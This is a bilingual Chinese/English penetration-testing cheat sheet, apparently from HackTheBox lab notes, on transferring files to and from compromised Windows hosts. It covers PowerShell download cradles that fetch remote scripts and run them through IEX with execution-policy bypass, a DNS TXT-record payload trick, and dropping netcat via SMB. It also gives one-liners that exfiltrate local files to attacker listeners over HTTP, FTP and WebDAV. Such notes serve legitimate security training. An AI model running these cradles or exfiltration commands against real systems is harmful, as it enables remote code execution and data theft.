WIndows

Let's use the Microsoft Astaroth Attack blog post as an example of an advanced persistent threat (APT).

Download

PowerShell Base64 Encode & Decode

当想将文件传到远程host但是无法用网络传输时，可简单地用base64字符串进行转换。 重点是确认是否完好传输。

TimeLess613@htb[/htb]$ md5sum id_rsa
4e301756a07ded0a2dd6953abf015278  id_rsa

TimeLess613@htb[/htb]$ cat id_rsa |base64 -w 0;echo (或 base64 id_rsa -w 0)

PS C:\htb> [IO.File]::WriteAllBytes("C:\Users\Public\id_rsa", [Convert]::FromBase64String("<base64-strings>"))


PS C:\htb> Get-FileHash C:\Users\Public\id_rsa -Algorithm md5
Algorithm       Hash                                                                   Path
---------       ----                                ----
MD5             4E301756A07DED0A2DD6953ABF015278    C:\Users\Public\id_rsa

• -w 0：宽度无限，指示输出的base64字符串不进行换行。即输出为1行。

[!NOTE] Note: While this method is convenient, it's not always possible to use. Windows Command Line utility (cmd.exe) has a maximum string length of 8,191 characters. Also, a web shell may error if you attempt to send extremely large strings.

PowerShell Web Downloads

下载脚本、字符串 ^368d24

Download Cradles

# IEX几种写法
powershell "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.9:8000/ipw.ps1')"
powershell IEX (New-Object Net.WebClient).downloadString('http://10.10.14.9:8000/ipw.ps1')
## 还可以pipe
(New-Object Net.WebClient).downloadString('http://10.10.14.9:8000/ipw.ps1') | IEX

#From cmd
echo IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.13:8000/PowerUp.ps1') | powershell -noprofile - 
#From PSv3
powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://10.2.0.5/shell.ps1')|iex"
iex (iwr '10.10.14.9:8000/ipw.ps1') 

$h=New-Object -ComObject Msxml2.XMLHTTP;$h.open('GET','http://10.10.14.9:8000/ipw.ps1',$false);$h.send();iex $h.responseText
$wr = [System.NET.WebRequest]::Create("http://10.10.14.9:8000/ipw.ps1") $r = $wr.GetResponse() IEX ([System.IO.StreamReader]($r.GetResponseStream())).ReadToEnd(

#https://twitter.com/Alh4zr3d/status/1566489367232651264
#host a text record with your payload at one of your (unburned) domains and do this: 
powershell . (nslookup -q=txt http://some.owned.domain.com)[-1]

下载文件 ^95a867

[!NOTE] 当下载脚本、字符串被查杀时，传递nc64有妙用。

# 简单：Invoke-WebRequest（别名iwr、wget、curl）、需要"-OutFile"参数。据说较慢
Invoke-WebRequest -uri <攻击机IP>/nc64.exe -outfile [C:\\Windows\Public\]nc64.exe


powershell -ep bypass -c (New-Object Net.WebClient).DownloadFile('<url>','<output>')

(New-Object Net.WebClient).DownloadFileAsync('<Target File URL>','<Output File Name>')



## 参照LOLBAS
certutil.exe

## 微软的Defender下载
powershell -NoProfile -ExecutionPolicy Bypass -Command $d=new-object System.Net.WebClient;$d.Proxy.Credentials=[System.Net.CredentialCache]::DefaultNetworkCredentials;$d.DownloadFile('http://download.microsoft.com/download/DefinitionUpdates/mpam-fe.exe','c:\work\mpam-fe.exe')

PowerShell offers many file transfer options. In any version of PowerShell, the System.Net.WebClient class can be used to download a file over HTTP, HTTPS or FTP. The following table describes WebClient methods for downloading data from a resource:

Method	Description
DownloadFile	Downloads data from a resource to a local file.
DownloadFileAsync	Downloads data from a resource to a local file without blocking the calling thread.

报错处理

-UseBasicParsing绕过IE首次启动配置尚未完成的阻止下载。

PS C:\htb> Invoke-WebRequest https://<ip>/PowerView.ps1 | IEX

Invoke-WebRequest : The response content cannot be parsed because the Internet Explorer engine is not available, or Internet Explorer's first-launch configuration is not complete. Specify the UseBasicParsing parameter and try again.
At line:1 char:1
+ Invoke-WebRequest https://raw.githubusercontent.com/PowerShellMafia/P ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotImplemented: (:) [Invoke-WebRequest], NotSupportedException
+ FullyQualifiedErrorId : WebCmdletIEDomNotSupportedException,Microsoft.PowerShell.Commands.InvokeWebRequestCommand

PS C:\htb> Invoke-WebRequest https://<ip>/PowerView.ps1 -UseBasicParsing | IEX

SSL证书报错。

PS C:\htb> IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/juliourena/plaintext/master/Powershell/PSUpload.ps1')

Exception calling "DownloadString" with "1" argument(s): "The underlying connection was closed: Could not establish trust
relationship for the SSL/TLS secure channel."
At line:1 char:1
+ IEX(New-Object Net.WebClient).DownloadString('https://raw.githubuserc ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : WebException

PS C:\htb> [System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}

SMB Downloads

Create the SMB Server

这个方式也可以用于上传。注意连接到smbserver的路径别漏了 /share。

TimeLess613@htb[/htb]$ sudo impacket-smbserver -smb2support share /tmp/smbshare

Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed

Copy a File from the SMB Server

C:\htb> copy \\192.168.220.133\share\nc.exe

        1 file(s) copied.

New versions of Windows block unauthenticated guest access, as we can see in the following command:

C:\htb> copy \\192.168.220.133\share\nc.exe

You can't access this shared folder because your organization's security policies block unauthenticated guest access. These policies help protect your PC from unsafe or malicious devices on the network.

所以可以创建有认证的share，并在目标机上挂载之：

TimeLess613@htb[/htb]$ sudo impacket-smbserver -smb2support share /tmp/smbshare -user test -password test

Mount the SMB Server (to drive n) with Username and Password

C:\htb> net use n: \\192.168.220.133\share /user:test test

The command completed successfully.

C:\htb> copy n:\nc.exe
        1 file(s) copied.

[!NOTE] Note: You can also mount the SMB server if you receive an error when you use copy filename \\IP\sharename.

FTP Downloads

Setting up a Python3 FTP Server

TimeLess613@htb[/htb]$ sudo pip3 install pyftpdlib

TimeLess613@htb[/htb]$ sudo python3 -m pyftpdlib --port 21

[I 2022-05-17 10:09:19] concurrency model: async
[I 2022-05-17 10:09:19] masquerade (NAT) address: None
[I 2022-05-17 10:09:19] passive ports: None
[I 2022-05-17 10:09:19] >>> starting FTP server on 0.0.0.0:21, pid=3210 <<<

Transfering Files from an FTP Server Using PowerShell

PS C:\htb> (New-Object Net.WebClient).DownloadFile('ftp://192.168.49.128/file.txt', 'C:\Users\Public\ftp-file.txt')

- 使用了ftp协议

自动化 FTP 操作

C:\htb> echo open 192.168.49.128 > ftpcommand.txt
C:\htb> echo USER anonymous >> ftpcommand.txt
C:\htb> echo binary >> ftpcommand.txt
C:\htb> echo GET file.txt >> ftpcommand.txt
C:\htb> echo bye >> ftpcommand.txt

C:\htb> ftp -v -n -s:ftpcommand.txt

ftp> open 192.168.49.128
Log in with USER and PASS first.
ftp> USER anonymous

ftp> GET file.txt
ftp> bye

C:\htb>more file.txt
This is a test file

- -s:ftpcommand.txt：指定命令文件

Upload

PowerShell Base64 Encode & Decode

PS C:\htb> [Convert]::ToBase64String((Get-Content -path "C:\Windows\system32\drivers\etc\hosts" -Encoding byte))

IyBD...<SNIP>...0DQo=

PS C:\htb> Get-FileHash "C:\Windows\system32\drivers\etc\hosts" -Algorithm MD5 | select Hash

Hash
----
3688374325B992DEF12793500307566D

上面命令是编码UTF-16LE，base64 -d竟然可以解码——似乎是因为用了-Encoding byte，将以字节单位读取指定文件而不是基于系统的默认编码（Windows的话UTF-16LE）。文件内容被直接读取为字节数组，没有进行任何字符编码转换。这种方式适用于需要处理二进制文件或想直接操作文件的原始字节数据的情况。

TimeLess613@htb[/htb]$ echo IyBD...<SNIP>...0DQo= | base64 -d > hosts

TimeLess613@htb[/htb]$ md5sum hosts 

PowerShell Web Uploads

Installing a Configured WebServer with Upload

uploadserver, an extended module of the Python HTTP.server module

TimeLess613@htb[/htb]$ pip3 install uploadserver
TimeLess613@htb[/htb]$ python3 -m uploadserver

PowerShell Script to Upload a File to Python Upload Server

PS C:\htb> IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/juliourena/plaintext/master/Powershell/PSUpload.ps1')
PS C:\htb> Invoke-FileUpload -Uri http://192.168.49.128:8000/upload -File C:\Windows\System32\drivers\etc\hosts

[+] File Uploaded:  C:\Windows\System32\drivers\etc\hosts
[+] FileHash:  5E7241D66FD77E9E8EA866B6278B2373

打靶版本（本地先下载脚本）：

$me='10.10.14.221'; IEX (New-Object Net.WebClient).DownloadString("http://$($me):80/PSUpload.ps1"); Invoke-FileUpload -Uri "http://$($me):8000/upload" -File "C:\Windows\System32\drivers\etc\hosts"

一行版本（不用下载上面的脚本了。少用，似乎会卡剪贴板）：

function Invoke-FileUpload { Param ([Parameter(Position = 0, Mandatory = $True)] [String]$File, [Parameter(Position = 1, Mandatory = $True)] [String]$Uri) $FileToUpload = Get-ChildItem -File "$File"; $UTF8woBOM = New-Object "System.Text.UTF8Encoding" -ArgumentList @($false); $boundary = '----timeless'; $tempFile = New-TemporaryFile; Remove-Item $tempFile -Force -ErrorAction Ignore; $sw = New-Object System.IO.StreamWriter($tempFile, $true, $UTF8woBOM); $fileName = [System.IO.Path]::GetFileName($FileToUpload.FullName); $sw.Write("--$boundary`r`nContent-Disposition: form-data;name=`"files`";filename=`"$fileName`"`r`n`r`n"); $sw.Close(); $fs = New-Object System.IO.FileStream($tempFile, [System.IO.FileMode]::Append); $bw = New-Object System.IO.BinaryWriter($fs); $fileBinary = [System.IO.File]::ReadAllBytes($FileToUpload.FullName); $bw.Write($fileBinary); $bw.Close(); $sw = New-Object System.IO.StreamWriter($tempFile, $true, $UTF8woBOM); $sw.Write("`r`n--$boundary--`r`n"); $sw.Close(); Invoke-RestMethod -Method POST -Uri $uri -ContentType "multipart/form-data; boundary=$boundary" -InFile $tempFile; $FileHash = Get-FileHash -Path "$File" -Algorithm MD5; Write-Host "[+] File Uploaded: " $FileToUpload.FullName; Write-Host "[+] FileHash: " $FileHash.Hash };   Invoke-FileUpload -Uri http://10.10.14.221:8000/upload -File upload_win.zip

PowerShell Base64 Web Upload

$b64 = [System.convert]::ToBase64String((Get-Content -Path 'C:\Windows\System32\drivers\etc\hosts' -Encoding Byte));   Invoke-WebRequest -Uri http://10.10.14.221:8000/ -Method POST -Body $b64

To receive:

TimeLess613@htb[/htb]$ nc -lvnp 8000

listening on [any] 8000 ...
connect to [192.168.49.128] from (UNKNOWN) [192.168.49.129] 50923
POST / HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
Content-Type: application/x-www-form-urlencoded
Host: 192.168.49.128:8000
Content-Length: 1820
Connection: Keep-Alive

IyBDb3B5cm...SNIP...

TimeLess613@htb[/htb]$ echo <base64> | base64 -d -w 0 > hosts

SMB Uploads over HTTP

Commonly enterprises don't allow the SMB protocol (TCP/445) out of their internal network because this can open them up to potential attacks.

• For more information: Preventing SMB traffic from lateral connections and entering or leaving the network

An alternative is to run SMB over HTTP with WebDav.  WebDAV (RFC 4918) is an extension of HTTP, the internet protocol that web browsers and web servers use to communicate with each other. The WebDAV protocol enables a webserver to behave like a fileserver, supporting collaborative content authoring. WebDAV can also use HTTPS.

Configuring WebDav Server

TimeLess613@htb[/htb]$ sudo pip3 install wsgidav cheroot
TimeLess613@htb[/htb]$ sudo wsgidav --host=0.0.0.0 --port=80 --root=/tmp --auth=anonymous

Connecting to the Webdav Share

When you use SMB, it will first attempt to connect using the SMB protocol, and if there's no SMB share available, it will try to connect using HTTP.

C:\htb> dir \\192.168.49.128\DavWWWRoot

 Volume in drive \\192.168.49.128\DavWWWRoot has no label.
 Volume Serial Number is 0000-0000

 Directory of \\192.168.49.128\DavWWWRoot

05/18/2022  10:05 AM    <DIR>          .
05/18/2022  10:05 AM    <DIR>          ..
05/18/2022  10:05 AM    <DIR>          sharefolder
05/18/2022  10:05 AM                13 filetest.txt
               1 File(s)             13 bytes
               3 Dir(s)  43,443,318,784 bytes free

• DavWWWRoot：指示跟目录。也可指定其他存在的目录。

Uploading Files using SMB

C:\htb> copy C:\Users\john\Desktop\SourceCode.zip \\192.168.49.129\DavWWWRoot\
C:\htb> copy C:\Users\john\Desktop\SourceCode.zip \\192.168.49.129\sharefolder\

[!note] 如果没有SMB的限制，可以用前面的impacket-smbserver方法

FTP Uploads

类似下载时。

TimeLess613@htb[/htb]$ sudo python3 -m pyftpdlib --port 21 --write

- --write：允许写入到服务端

PS C:\htb> (New-Object Net.WebClient).UploadFile('ftp://192.168.49.128/ftp-hosts', 'C:\Windows\System32\drivers\etc\hosts')

自动化 FTP 操作

C:\htb> echo open 192.168.49.128 > ftpcommand.txt
C:\htb> echo USER anonymous >> ftpcommand.txt
C:\htb> echo binary >> ftpcommand.txt
C:\htb> echo PUT c:\windows\system32\drivers\etc\hosts >> ftpcommand.txt
C:\htb> echo bye >> ftpcommand.txt
C:\htb> ftp -v -n -s:ftpcommand.txt
ftp> open 192.168.49.128

Log in with USER and PASS first.


ftp> USER anonymous
ftp> PUT c:\windows\system32\drivers\etc\hosts
ftp> bye

- 上传时用PUT

Misc

WinRM

LOL

To search for download and upload functions in LOLBAS we can use /download or /upload.